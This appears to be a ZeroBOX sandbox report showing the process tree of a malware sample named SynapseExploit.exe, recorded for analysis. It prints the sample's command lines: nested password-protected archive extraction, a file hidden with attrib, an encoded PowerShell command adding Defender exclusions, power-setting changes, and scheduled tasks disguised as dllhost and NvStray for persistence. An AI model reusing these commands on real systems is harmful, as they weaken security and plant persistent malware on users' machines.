| ZeroBOX

SynapseExploit.exe "C:\Users\test22\AppData\Local\Temp\SynapseExploit.exe"
1000
- AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2116
  - conhost.exe "C:\Users\test22\AppData\Local\Temp\conhost.exe"
    2896
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\temp\main.bat" /S"
      3016
      - mode.com mode 65,10
        2064
      - 7z.exe 7z.exe e file.zip -p32606511521849235062050926056 -oextracted
        2144
      - 7z.exe 7z.exe e extracted/file_9.zip -oextracted
        2216
      - 7z.exe 7z.exe e extracted/file_8.zip -oextracted
        1156
      - 7z.exe 7z.exe e extracted/file_7.zip -oextracted
        2324
      - 7z.exe 7z.exe e extracted/file_6.zip -oextracted
        2632
      - 7z.exe 7z.exe e extracted/file_5.zip -oextracted
        2788
      - 7z.exe 7z.exe e extracted/file_4.zip -oextracted
        2800
      - 7z.exe 7z.exe e extracted/file_3.zip -oextracted
        1508
      - 7z.exe 7z.exe e extracted/file_2.zip -oextracted
        1752
      - 7z.exe 7z.exe e extracted/file_1.zip -oextracted
        2848
      - attrib.exe attrib +H "Installer.exe"
        2984
      - Installer.exe "Installer.exe"
        1340
        
        cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEgAbgBOAEcAYwBVADIAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAYwAwAFkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANgAxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQANgBDAHMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
        2188
        
        powershell.exe powershell -EncodedCommand "PAAjAEgAbgBOAEcAYwBVADIAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAYwAwAFkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANgAxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQANgBDAHMAIwA+AA=="
        2292
        
        powercfg.exe powercfg /x -hibernate-timeout-ac 0
        2576
        
        powercfg.exe powercfg /x -hibernate-timeout-dc 0
        2628
        
        powercfg.exe powercfg /x -standby-timeout-ac 0
        1552
        
        powercfg.exe powercfg /x -standby-timeout-dc 0
        2908
        
        powercfg.exe powercfg /hibernate off
        2944
        
        cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2172
        
        schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2780
        
        cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2840
        
        schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        2676
  - svchost.exe "C:\Users\test22\AppData\Local\Temp\svchost.exe"
    2940

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents